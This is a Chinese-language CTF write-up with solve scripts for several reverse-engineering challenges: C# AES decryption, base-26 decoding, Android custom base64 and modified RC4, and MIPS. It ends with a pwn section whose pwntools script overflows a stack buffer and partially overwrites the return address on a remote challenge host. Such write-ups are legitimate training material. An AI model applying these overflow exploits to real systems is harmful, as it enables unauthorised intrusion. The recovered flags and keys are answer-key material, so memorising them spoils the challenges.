显然首位为N，后面的jingshiwoziji(竟是我自己)显然是对的，再结合开头的xia小猜测是小丑竟是我自己，即

Nep{x1@oChoU_JinG$HiW0zij!??}

尝试发现正确

Re

hardcsharp

看名字就知道应该是C#逆向，一开始傻逼如我拖进ida看，憨憨我就是呜呜呜

用.net reflactor工具反汇编

发现这里面主要的难点是一个AES：

写出exp直接出结果：

import base64
from Crypto.Cipher import AES

buffer =  [0x51, 0x52, 0x57, 0x51, 0x52, 0x57, 0x44, 0x5c, 0x5e, 0x56, 0x5d, 0x12, 0x12, 0x12, 0x12, 0x12,
        0x12, 0x12, 0x12, 0x12, 0x12, 0x12, 0x12, 0x12, 0x12, 0x12, 0x12, 0x12, 0x12, 0x12, 0x12, 18]
key = ''
for b in buffer:
    key += chr(b ^ 0x33)

enc = base64.b64decode(b'1Umgm5LG6lNPyRCd0LktJhJtyBN7ivpq+EKGmTAcXUM+0ikYZL4h4QTHGqH/3Wh0')
cipher = AES.new(key.encode(), AES.MODE_ECB)
print(cipher.decrypt(enc))

二十六进制

第一次体验这种题，好好玩貌似是把输入转化为26进制，还对7异或了一下:

找到了26进制中0-25使用的符号，可能还需要异或7：

应该是最后产生的26进制数：

直接恢复成十进制数发现不对，仔细看了下代码发现要倒过来：

exp:

import hashlib
from binascii import b2a_hex

base = b'2163qwe)(*&^%489$!057@#><A'
num = b'6&>27bF'
flag = 0
for n in num:
    flag *= 26
    flag += base.find(n ^ 7)
flag = hashlib.md5(str(flag).encode()).digest()
print(f'Nep{{{b2a_hex(flag).decode()}}}')

password

安卓逆向是我最喜欢的部分了，先解压发现还有个flag.zip文件还是加密的，看来是要拿到这个压缩包密码了

发现lib下面有so文件，老套路了估计也要逆向分析so文件

jadx打开apk文件，发现分别对key和明文进行了校验：

首先第一个是校验key的部分，但是jadx里面没有东西，拖进ida里面分析，shift+f12发现几个关键的小东西两个16进制以及一串神秘字符

仔细一看发现就是变表BASE64：

将两串16进制解码取出关键部分,一开始忘了要逆序我吐了(多字节的数据都是小段存储)

求解key：

import base64
import string

str1 = "7+RmFXP2LWP2L6g3"[::-1] + "==qi7esi"[::-1]
print(str1)
string1 = "abcdefghijklmnopqrstuvwxyz0123456789+/ABCDEFGHIJKLMNOPQRSTUVWXYZ"
string2 = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"

print (base64.b64decode(str1.translate(str.maketrans(string1,string2))))

解得key为：th1s_1s_k3y!!!!!
再看看校验明文的部分：

和上次看到的RC4有一点点像，有一点小改动，自己写不来网上抄一份RC4源码改改：

#include <cstdio>
#include <cstring>
#include <algorithm>
#define Byte unsigned char
using std::swap;

Byte S[256],T[256];
char key[256] = "th1s_1s_k3y!!!!!";
int keylen = strlen(key);

void RC4Init(){
    for(int i = 0;i < 256;i++) S[i] = 256 - i,T[i] = key[i % keylen];
    int j = 0;
    for(int i = 0;i < 256;i++){
        j = (j + S[i] + T[i]) % 256;
        swap(S[i],S[j]);
    }
}

void RC4(Byte *dest,const char *src){
    RC4Init();
    int i = 0,j = 0;
    for(int k = 0;src[k];k++){
        i = (i + 1) % 256;
        j = (j + S[i]) % 256;
        swap(S[i],S[j]);
        int t = (S[i] + S[j]) % 256;
        dest[k] = src[k] ^ S[t];
    }
}

int main(){
    Byte dest[100] = {0};
    RC4(dest,"\x8b\xd2\xd9\x5d\x95\xff\x7e\x5f\x29\x56\x12\xb9\xef\xec\x8b\xd0\x45");
    puts((char*)dest);
}

得到压缩包密码后解压apk中的zip文件即可得到flag，完美。

easymips

百度mips说都是32位的

不多说，直接上我的IDA7.5

加密过程还是非常清晰，直接写出exp：

#include <cstdio>
#include <cstdlib>
#include <cstring>

int main(){
    char enc[100] = "3_isjA0UeQZcNa\\`\\Vf";
    printf("%d\n",strlen(enc));
    for(int i = 0;i < 19;i ++){
        enc[i] += i + 5;
    }
    srand(0x1C5Eu);
    enc[0] ^= ((rand() ^ 0x65) >> 24) + 50;
    enc[5] ^= ((rand() ^ 0x70) >> 24) - 57;
    enc[6] ^= (rand() >> 4) + 48;
    printf("%s\n", enc);
}

pwn

送你一朵小红花

首先checksec发现开启了地址随机化，只有三字节不变，覆盖返回地址低两位，第一位我太懒了还是设为原来的1，如果成功他会执行cat /flag，漏洞利用是在main的read函数当中，ida上面看到buf那里是8，64位程序所以填充8加上rbp的8共16

放出菜鸡的利用exp，多执行几次就有flag了，也不知道有没有啥高级的方法，试了十多次才出结果

from pwn import *

context.log_level='debug'
#io = process('./xhh')
io = remote('node2.hackingfor.fun', 32030)

payload = 'a' * 0x10 + '\xe1\x14' 

io.send(payload)

io.interactive()